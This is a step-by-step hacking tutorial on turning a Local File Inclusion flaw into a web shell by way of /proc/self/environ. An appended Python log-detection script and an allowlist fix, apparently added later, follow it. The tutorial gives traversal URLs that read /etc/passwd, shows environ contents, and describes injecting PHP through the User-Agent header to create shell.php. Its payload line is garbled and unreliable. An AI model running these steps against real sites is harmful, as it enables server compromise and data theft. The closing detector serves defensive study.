1 - Introduction
2 - Discovery LFI
3 - Check if /proc/self/environ is accessible
4 - Malicious code injection
5 - Access to the shell
6 - Thanks

>> 1 - Introduction


In this tutorial I will show how to obtain a shell on a site using Local File Inclusion and
injecting malicious code into /proc/self/environ. It is a tutorial that explains everything step by step.

>> 2 - Discovery LFI


- Now let us find a site vulnerable to Local File Inclusion. I found one to verify:

www.website.com/view.php?page=contact.php

- Now let us replace contact.php with ../ and the URL will become

www.website.com/view.php?page=../

and we get an error:

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

There is a good chance we have a Local File Inclusion vulnerability. Let's move on.

- Let us check whether we can access /etc/passwd to see if the site is vulnerable to Local File Inclusion. Let's make a request:

www.website.com/view.php?page=../../../etc/passwd

We get an error and the file /etc/passwd is not included.

Warning: include(../) [function.include]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337

We climb a few more directories:

www.website.com/view.php?page=../../../../../etc/passwd

We successfully included the file /etc/passwd.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

>> 3 - Check if /proc/self/environ is accessible


- Now let us see if /proc/self/environ is accessible. We replace /etc/passwd with /proc/self/environ:

www.website.com/view.php?page=../../../ ... LF / environ

If you get something like

DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.website.com
HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80

then /proc/self/environ is accessible. If you get a blank page or an error, it is not accessible or the operating system is FreeBSD.


>> 4 - Malicious code injection


- Now let us inject our malicious code into /proc/self/environ. How do we do this? We inject the code in the HTTP User-Agent header.
Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data and make a request to the URL:

www.website.com/view.php?page=../../../ ... LF / environ

Choose Tamper and, in the User-Agent field, write the following code:

A shell.php available @ ;?>

Then, submit the request.

Our command will be executed through the system() function, and our shell will be created. If it does not work,
try exec(), because system() can be restricted on a server in php.ini.

>> 5 - Access to the shell


- Now let us check whether our malicious code has been injected successfully. Let's see if the shell is present:

www.website.com/shell.php

Shell was successful.

I hope you enjoy!!!
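
An added example, not part of the original tutorial: a Python check for web access logs that flags the two request patterns described in sections 2 to 4, namely a directory traversal in the query string that reaches /etc/passwd or /proc/self/environ, and a PHP open tag in the User-Agent or Referer header. It assumes Apache's combined log format; the function names, log lines and IP address are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format; quoted fields may contain \" escapes.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)
TRAVERSAL = re.compile(r'\.\.[/\\]')
SENSITIVE = re.compile(r'proc/self/environ|etc/passwd', re.I)
PHP_TAG = re.compile(r'<\?')


def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so ..%2F and ..%252F both become ../"""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_line(line):
    """Return the set of findings for one access-log line (empty set = clean)."""
    m = LOG_RE.match(line)
    if not m:
        return {"unparsed"}
    findings = set()
    uri = fully_decode(m["uri"])
    if TRAVERSAL.search(uri):
        findings.add("traversal")
    if SENSITIVE.search(uri):
        findings.add("sensitive_file")
    # environ echoes request headers, so a PHP open tag in one is the injection step
    if any(PHP_TAG.search(fully_decode(m[h])) for h in ("agent", "referer")):
        findings.add("php_in_header")
    return findings


# Constructed sample lines (documentation IP range, placeholder header value).
SAMPLE = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:56:01 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1873 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Oct/2023:13:57:12 +0000] "GET /view.php?page=..%252F..%252F..%252Fproc%252Fself%252Fenviron HTTP/1.1" 200 912 "-" "<?php /* constructed placeholder */ ?>"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(sorted(inspect_line(entry)), entry[:60])
```

Log detection is only a backstop. The fix is in view.php itself: map the page parameter to a fixed allowlist of files instead of passing user input to include().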
